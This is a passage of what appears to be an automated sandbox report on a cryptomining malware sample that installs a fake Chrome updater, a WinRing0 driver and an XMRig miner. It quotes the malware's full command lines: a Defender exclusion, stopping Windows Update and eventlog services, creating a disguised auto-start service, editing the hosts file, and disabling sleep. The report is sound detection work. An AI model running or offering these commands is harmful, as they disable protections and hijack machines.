                Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                Source: updater.exe, 00000022.00000003.2186145192.000002166E710000.00000004.00000001.00020000.00000000.sdmp, mnidgyzvuran.sys.34.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: updater.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
                Source: explorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: updater.exe, 00000022.00000003.2185772591.000002166E710000.00000004.00000001.00020000.00000000.sdmp, TwrhjEKqxk.exe, updater.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: updater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Modifies the hosts file
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                Source: Process Memory Space: updater.exe PID: 3620, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                PE file contains section with special chars
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: TwrhjEKqxk.exeStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Source: updater.exe.0.drStatic PE information: section name:
                Uses powercfg.exe to modify the power settings
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\conhost.exeCode function: 57_2_0000000140001394 NtSetTimer2,57_2_0000000140001394
                Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\mnidgyzvuran.sysJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_xfvot4ly.d1u.ps1Jump to behavior
                Source: C:\Windows\System32\conhost.exeCode function: 57_2_000000014000316057_2_0000000140003160
                Source: C:\Windows\System32\conhost.exeCode function: 57_2_00000001400026E057_2_00000001400026E0
                Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\mnidgyzvuran.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: updater.exe.0.drStatic PE information: Number of sections : 14 > 10
                Source: TwrhjEKqxk.exeStatic PE information: Number of sections : 14 > 10
                Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 34.3.updater.exe.2166ee40000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 34.3.updater.exe.2166ee40000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: Process Memory Space: updater.exe PID: 3620, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: TwrhjEKqxk.exeStatic PE information: Section: ZLIB complexity 0.9915558370276546
                Source: TwrhjEKqxk.exeStatic PE information: Section: ZLIB complexity 1.002230784830663
                Source: TwrhjEKqxk.exeStatic PE information: Section: ZLIB complexity 1.0413533834586466
                Source: TwrhjEKqxk.exeStatic PE information: Section: ZLIB complexity 1.5625
                Source: TwrhjEKqxk.exeStatic PE information: Section: ZLIB complexity 2.3333333333333335
                Source: TwrhjEKqxk.exeStatic PE information: Section: ZLIB complexity 1.030054644808743
                Source: TwrhjEKqxk.exeStatic PE information: Section: ZLIB complexity 1.1047619047619048
                Source: TwrhjEKqxk.exeStatic PE information: Section: .reloc ZLIB complexity 1.5
                Source: updater.exe.0.drStatic PE information: Section: ZLIB complexity 0.9915558370276546
                Source: updater.exe.0.drStatic PE information: Section: ZLIB complexity 1.002230784830663
                Source: updater.exe.0.drStatic PE information: Section: ZLIB complexity 1.0413533834586466
                Source: updater.exe.0.drStatic PE information: Section: ZLIB complexity 1.5625
                Source: updater.exe.0.drStatic PE information: Section: ZLIB complexity 2.3333333333333335
                Source: updater.exe.0.drStatic PE information: Section: ZLIB complexity 1.030054644808743
                Source: updater.exe.0.drStatic PE information: Section: ZLIB complexity 1.1047619047619048
                Source: updater.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                Source: mnidgyzvuran.sys.34.drBinary string: \Device\WinRing0_1_2_0
                Source: classification engineClassification label: mal100.adwa.spyw.evad.mine.winEXE@82/13@1/1
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6472:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1440:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6620:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2516:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5280:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6004:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1088:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5356:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3652:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5944:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1476:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6332:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7124:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bno5m1rc.e3z.ps1Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: TwrhjEKqxk.exeReversingLabs: Detection: 55%
                Source: TwrhjEKqxk.exeVirustotal: Detection: 45%
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile read: C:\Users\user\Desktop\TwrhjEKqxk.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\TwrhjEKqxk.exe "C:\Users\user\Desktop\TwrhjEKqxk.exe"
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe explorer.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
